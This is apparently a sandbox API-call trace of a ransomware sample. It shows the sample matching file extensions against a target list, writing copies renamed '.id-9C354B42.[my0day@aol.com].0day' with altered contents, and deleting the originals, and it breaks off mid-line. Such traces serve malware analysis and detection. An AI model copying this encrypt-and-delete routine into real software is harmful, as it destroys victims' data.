[0042.637] lstrlenW (lpString=".zip") returned 4 [0042.637] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.637] lstrlenW (lpString=".rar") returned 4 [0042.637] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.637] lstrlenW (lpString=".bz2") returned 4 [0042.637] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.637] lstrlenW (lpString=".7z") returned 3 [0042.637] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.637] lstrlenW (lpString=".dbf") returned 4 [0042.637] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.637] lstrlenW (lpString=".1cd") returned 4 [0042.637] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0042.637] lstrlenW (lpString=".jpg") returned 4 [0042.637] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.637] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0042.637] lstrlenW (lpString="Roses.htm") returned 9 [0042.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0042.639] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=233) returned 1 [0042.639] CloseHandle (hObject=0x1d8) returned 1 [0042.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0042.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.639] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0042.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0042.639] lstrlenW (lpString=".doc") returned 4 [0042.639] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.639] lstrlenW (lpString=".docx") returned 5 [0042.639] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.639] lstrlenW (lpString=".pdf") returned 4 [0042.639] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.639] lstrlenW (lpString=".xls") returned 4 [0042.639] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.639] lstrlenW (lpString=".xlsx") returned 5 [0042.639] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.639] lstrlenW (lpString=".ppt") returned 4 [0042.639] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0042.639] lstrlenW (lpString=".zip") returned 4 [0042.639] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.639] lstrlenW (lpString=".rar") returned 4 [0042.640] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.640] lstrlenW (lpString=".bz2") returned 4 [0042.640] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.640] lstrlenW (lpString=".7z") returned 3 [0042.640] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 67 [0042.640] lstrlenW (lpString=".dbf") returned 4 [0042.640] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.654] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.654] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.656] GetLastError () returned 0x0 [0042.656] ReadFile (in: hFile=0x1d8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x621, lpOverlapped=0x0) returned 1 [0042.657] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x630, lpOverlapped=0x0) returned 1 [0042.658] ReadFile (in: hFile=0x1d8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.658] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.658] SetEndOfFile (hFile=0x20c) returned 1 [0042.658] CloseHandle (hObject=0x20c) returned 1 [0042.658] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.658] SetEndOfFile (hFile=0x1d8) returned 1 [0042.659] CloseHandle (hObject=0x1d8) returned 1 [0042.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0042.660] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1 [0042.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.660] lstrlenW (lpString=".doc") returned 4 [0042.660] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.660] lstrlenW (lpString=".docx") returned 5 [0042.660] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.660] lstrlenW (lpString=".pdf") returned 4 [0042.660] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.660] lstrlenW (lpString=".xls") returned 4 [0042.660] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.660] lstrlenW (lpString=".xlsx") returned 5 [0042.660] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.660] lstrlenW (lpString=".ppt") returned 4 [0042.660] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.660] lstrlenW (lpString=".zip") returned 4 [0042.660] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.660] lstrlenW (lpString=".rar") returned 4 [0042.660] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.660] lstrlenW (lpString=".bz2") returned 4 [0042.660] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.660] lstrlenW (lpString=".7z") returned 3 [0042.660] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.660] lstrlenW (lpString=".dbf") returned 4 [0042.661] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString=".1cd") returned 4 [0042.661] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString=".jpg") returned 4 [0042.661] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString=".doc") returned 4 [0042.661] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.661] lstrlenW (lpString=".docx") returned 5 [0042.661] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.661] lstrlenW (lpString=".pdf") returned 4 [0042.661] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString=".xls") returned 4 [0042.661] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString=".xlsx") returned 5 [0042.661] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.661] lstrlenW (lpString=".ppt") returned 4 [0042.661] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString=".zip") returned 4 [0042.661] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString=".rar") returned 4 [0042.661] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.661] lstrlenW (lpString=".bz2") returned 4 [0042.661] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.661] lstrlenW (lpString=".7z") returned 3 [0042.661] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.661] lstrlenW (lpString=".dbf") returned 4 [0042.662] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.662] lstrlenW (lpString=".1cd") returned 4 [0042.662] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.662] lstrlenW (lpString=".jpg") returned 4 [0042.662] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.662] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0042.662] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0042.663] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=25234) returned 1 [0042.663] CloseHandle (hObject=0x1d8) returned 1 [0042.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20 [0042.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0042.663] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.663] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.664] GetLastError () returned 0x0 [0042.664] ReadFile (in: hFile=0x1d8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x6292, lpOverlapped=0x0) returned 1 [0042.665] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x62a0, lpOverlapped=0x0) returned 1 [0042.666] ReadFile (in: hFile=0x1d8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.667] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.667] SetEndOfFile (hFile=0x20c) returned 1 [0042.667] CloseHandle (hObject=0x20c) returned 1 [0042.667] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.667] SetEndOfFile (hFile=0x1d8) returned 1 [0042.668] CloseHandle (hObject=0x1d8) returned 1 [0042.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0042.668] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0042.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.668] lstrlenW (lpString=".doc") returned 4 [0042.668] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.668] lstrlenW (lpString=".docx") returned 5 [0042.668] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.668] lstrlenW (lpString=".pdf") returned 4 [0042.668] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString=".xls") returned 4 [0042.669] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.669] lstrlenW (lpString=".xlsx") returned 5 [0042.669] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.669] lstrlenW (lpString=".ppt") returned 4 [0042.669] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString=".zip") returned 4 [0042.669] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.669] lstrlenW (lpString=".rar") returned 4 [0042.669] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.669] lstrlenW (lpString=".bz2") returned 4 [0042.669] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString=".7z") returned 3 [0042.669] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString=".dbf") returned 4 [0042.669] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString=".1cd") returned 4 [0042.669] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString=".jpg") returned 4 [0042.669] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.669] lstrlenW (lpString=".doc") returned 4 [0042.669] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.669] lstrlenW (lpString=".docx") returned 5 [0042.669] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.669] lstrlenW (lpString=".pdf") returned 4 [0042.669] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.670] lstrlenW (lpString=".xls") returned 4 [0042.670] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.670] lstrlenW (lpString=".xlsx") returned 5 [0042.670] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.670] lstrlenW (lpString=".ppt") returned 4 [0042.670] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.670] lstrlenW (lpString=".zip") returned 4 [0042.670] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.670] lstrlenW (lpString=".rar") returned 4 [0042.670] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.670] lstrlenW (lpString=".bz2") returned 4 [0042.670] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.670] lstrlenW (lpString=".7z") returned 3 [0042.670] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.670] lstrlenW (lpString=".dbf") returned 4 [0042.670] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.670] lstrlenW (lpString=".1cd") returned 4 [0042.670] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.670] lstrlenW (lpString=".jpg") returned 4 [0042.670] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.670] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0042.670] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.743] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2985) returned 1 [0043.743] CloseHandle (hObject=0x17c) returned 1 [0043.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 0x20 [0043.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.744] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.744] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.257] GetLastError () returned 0x0 [0044.257] ReadFile (in: hFile=0x17c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xba9, lpOverlapped=0x0) returned 1 [0044.259] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xbb0, lpOverlapped=0x0) returned 1 [0044.260] ReadFile (in: hFile=0x17c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.260] WriteFile (in: hFile=0x20c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.260] SetEndOfFile (hFile=0x20c) returned 1 [0044.628] CloseHandle (hObject=0x20c) returned 1 [0044.628] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.630] SetEndOfFile (hFile=0x17c) returned 1 [0044.645] CloseHandle (hObject=0x17c) returned 1 [0044.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.654] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1 [0044.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.655] lstrlenW (lpString=".doc") returned 4 [0044.655] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.655] lstrlenW (lpString=".docx") returned 5 [0044.655] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.655] lstrlenW (lpString=".pdf") returned 4 [0044.655] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.655] lstrlenW (lpString=".xls") returned 4 [0044.655] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.655] lstrlenW (lpString=".xlsx") returned 5 [0044.655] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.655] lstrlenW (lpString=".ppt") returned 4 [0044.655] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.655] lstrlenW (lpString=".zip") returned 4 [0044.655] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.655] lstrlenW (lpString=".rar") returned 4 [0044.655] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.655] lstrlenW (lpString=".bz2") returned 4 [0044.655] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.655] lstrlenW (lpString=".7z") returned 3 [0044.656] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 